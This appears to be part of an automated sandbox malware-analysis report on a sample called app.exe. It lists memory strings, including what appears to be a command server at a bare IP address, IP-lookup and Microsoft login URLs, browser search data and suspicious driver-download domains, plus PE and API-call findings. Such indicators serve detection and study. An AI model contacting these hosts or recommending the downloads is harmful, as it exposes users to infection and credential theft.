Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107954475.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103448637.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/B
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/J
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/U
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/Y
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/e&
Source: app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/v
Source: app.exe, 00000003.00000003.3246373817.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/z
Source: app.exe, 00000003.00000003.3112020011.0000000000956000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123955917.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3121520475.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116384116.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3126108218.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3118889457.000000000095B000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114263668.0000000000956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230/~
Source: app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3101845651.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3103619876.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/-35b871f0a661
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/-35b871f0a661ozi
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/L
Source: app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/R
Source: app.exe, 00000003.00000003.3105612570.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3107523130.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3111746106.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3109755043.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3114168289.0000000005584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/T
Source: app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132482295.000000000558B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/o
Source: app.exe, 00000003.00000003.3139260264.0000000005588000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3123698644.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3134624186.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3130432829.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3132299964.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3125985144.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3128278501.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3139068962.0000000005584000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3116136458.0000000005586000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3136784723.0000000005586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230:80/w
Source: app.exe, 00000003.00000002.3294569055.00000000008CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://144.208.127.230U
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: app.exe, 00000003.00000002.3295913444.0000000002530000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://POSTHTTP/1.1Content-Type:
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setupMicrosoft
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alldrivers4devices.net
Source: app.exe, 00000003.00000003.3246373817.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3177623712.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000913000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3092789933.000000000091F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3294569055.000000000090A000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3093090885.0000000000904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://consent.trustarc.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRJX35jqtu8qT267s2bDnzhp-lJVMQdhF5S6U4t
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcRgJaQoM7DXWRt-dg7YoOenavsVCx2_mgiT8oFn
Source: app.exe, 00000003.00000002.3297646985.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3292208873.00000000055DC000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://encrypted-tbn0.gstatic.com/licensed-image?q=tbn:ANd9GcSFe5-1ue4YewDL7QTtYG5GBPfUy7h9iJ7t-0kd
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipOvNh-L3TTVll_wDyQd66TEaShUCp3i0iabc8se=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3242282826.00000000055C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3242197510.00000000058C6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3246273895.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh5.googleusercontent.com/p/AF1QipPFr704HJkdqZ5xefxGs53Btx8SeAbaCnWxa6-y=w92-h92-n-k-no
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
Source: app.exe, 00000003.00000003.3183161453.00000000058D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/0
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306401&rver=7.0.6738.0&wp=M
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=op
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/post.srf?client_id=77f68844-337b-4044-a0d4-153795cf9153&scope=openid
Source: app.exe, 00000003.00000003.3182590144.00000000058D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: app.exe, 00000003.00000003.3093301962.000000000551F000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000002.3296988780.0000000005518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: app.exe, 00000003.00000003.3182859527.00000000055F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://office.com/setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recoveringlib.blogspot.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;9
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: app.exe, 00000003.00000003.3177221257.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashaert
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182590144.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows-drivers-x04.blogspot.com
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=at
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=autoit
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setupMicrosoft
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00424B38 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

System Summary

barindex
PE file contains section with special chars
Source: app.exeStatic PE information: section name: )m&
Source: app.exe.0.drStatic PE information: section name: )m&
PE file has a writeable .text section
Source: app.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: app.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C02D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C77D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025902D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025977D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02579E36 AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtDeviceIoControlFile,RtlNtStatusToDosError,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A44A: GetCurrentProcess,SetPriorityClass,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_004092DE
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00404358
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040941D
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040964F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0040A770
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00407703
